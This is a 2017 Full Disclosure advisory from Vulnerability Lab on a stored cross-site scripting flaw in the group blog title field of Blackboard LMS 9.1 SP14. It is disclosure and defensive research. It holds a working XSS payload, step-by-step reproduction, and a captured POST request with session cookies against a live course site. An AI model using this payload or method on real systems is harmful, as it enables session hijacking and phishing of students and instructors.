
Date: Wed, 11 Jan 2017 10:51:42 +0100
From: Vulnerability Lab <research@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] BlackBoard LMS 9.1 SP14 - (Title) Persistent Vulnerability

Document Title:
===============
BlackBoard LMS 9.1 SP14 - (Title) Persistent Vulnerability 


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1901


Release Date:
=============
2017-01-10


Vulnerability Laboratory ID (VL-ID):
====================================
1901


Common Vulnerability Scoring System:
====================================
3.6


Product & Service Introduction:
===============================
Bring your classrooms online with Blackboard's learning management system (LMS) offerings. With tools to engage, 
collaborate, grade, track assignments and more, you can reach students to ensure they effectively interact with 
the content and curriculum. Regardless of the environment, there are core components of online learning that 
enrich the learning process.

(Copy of the Homepage: http://www.blackboard.com/learning-management-system/lms-software.aspx )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a stored cross site scripting vulnerability in the BlackBoard LMS  9.1 SP14 web-application.


Vulnerability Disclosure Timeline:
==================================
2017-01-10:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
BlackBoard Inc.
Product: Blackboard LMS - Content Management System 9.1 SP 14


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent cross site scripting vulnerability has been discovered in the official BlackBoard LMS web-application.
The issue allows remote attackers to inject own malicious script codes to the application-side of the vulnerable module. 

Remote attackers are able to inject malicious java script code into blackboard blog module `Groups -- Group Blogs`, users 
with low privileged access are able to inject via blog entries name [blog post title] input. The vulnerability is located 
in the title of the blog entries. The vulnerable parameter `title` becomes stored during the save procedure which results 
in a persistent attack. The request method to inject the malicious script code is POST. We discovered during the tests 
that any user (student) can create groups to share blog entries with others users and instructors(admins).

The security risk of the xss vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 3.6. 
Exploitation of the client-side vulnerabilities requires no privileged web-application user account and only low user interaction. 
Successful exploitation of the vulnerability results in non-persistent phishing attacks, session hijacking, non-persistent external 
redirect to malicious sources and non-persistent manipulation of affected or connected web module context.

Request Method(s):
[+] POST 

Vulnerable Module(s): 
[+] ./webapps/blogs-journals/execute/editBlogEntry

Vulnerable Parameter(s):
[+] title


Proof of Concept (PoC):
=======================
The application-side web vulnerabilities can be exploited by remote attackers with low privileged application user account and low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce ...
1. User(studnet) goes to groups module > Group Blog . 
2. Add new Blog Entry and fill the title field with persistent payload ['><img src=x onerror=prompt(vulnlab)>] and save it 
3. All group users besides instructor(admin) is on XSS impact remotely 
4. User(student) can use this direct link filled with correct blog entries and course id for remote exploitation 
Note: https://www.coursesites.com/webapps/blogs-journals/execute/viewBlog?course_id=[COURSEID]&blog_id=[BLOGID]&type=blogs&group_id=[GROUPID]#entry[ENTRYID]
5. Successfully repoduce of the vulnerability!


--- PoC Session Logs [POST] ---
POST /webapps/blogs-journals/execute/editBlogEntry HTTP/1.1
Host: www.coursesites.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.coursesites.com/webapps/blogs-journals/execute/editBlogEntry?course_id=_431252_1&editBlogEntryAction=createBlogEntry&type=blogs&blog_id=_312829_1&group_id=_181115_1
Cookie: JSESSIONID=58EB3946445655C52261E889490C91B3; __utma=154552106.1787260759.1470597563.1470656643.1470739482.4; 
COOKIE_CONSENT_ACCEPTED=true; NSC_106969_wjq_69.196.229.208.hspvq=ffffffff090d149145525d5f4f58455e445a4a42378b; 
session_id=F79695995C5FFC248070A1866553BD4F; s_session_id=399624D4A37441544BECB62DDCA5D814; 
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------1940990443924357844937052572
Content-Length: 2614
-----------------------------1940990443924357844937052572
Content-Disposition: form-data; name="blackboard.platform.security.NonceUtil.nonce"
f1d585ce-9d86-4d1b-b7e1-d344ac3122ec
-----------------------------1940990443924357844937052572
Content-Disposition: form-data; name="isAddForm"
true
-----------------------------1940990443924357844937052572
Content-Disposition: form-data; name="course_id"
_431252_1
-----------------------------1940990443924357844937052572
Content-Disposition: form-data; name="blog_entry_id"
-----------------------------1940990443924357844937052572
Content-Disposition: form-data; name="blog_id"
_312829_1
-----------------------------1940990443924357844937052572
Content-Disposition: form-data; name="group_id"
_181115_1
-----------------------------1940990443924357844937052572
Content-Disposition: form-data; name="owner_id"
_7028078_1
-----------------------------1940990443924357844937052572
Content-Disposition: form-data; name="type"
blogs
-----------------------------1940990443924357844937052572
Content-Disposition: form-data; name="submitAction"
post
-----------------------------1940990443924357844937052572
Content-Disposition: form-data; name="editBlogEntryAction"
add
-----------------------------1940990443924357844937052572
Content-Disposition: form-data; name="title"


Reference(s):
http://bb-lms.localhost:8080/
http://bb-lms.localhost:8080/webapps/
http://bb-lms.localhost:8080/webapps/blogs-journals/
http://bb-lms.localhost:8080/webapps/blogs-journals/execute/
http://bb-lms.localhost:8080/webapps/blogs-journals/execute/editBlogEntry


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Lawrence Amer - ( http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer )


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, 
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, 
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised 
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Contact:    admin@...nerability-lab.com 	- research@...nerability-lab.com 				- admin@...lution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically 
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or 
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific 
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@...nerability-lab.com) to get a ask permission.

				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/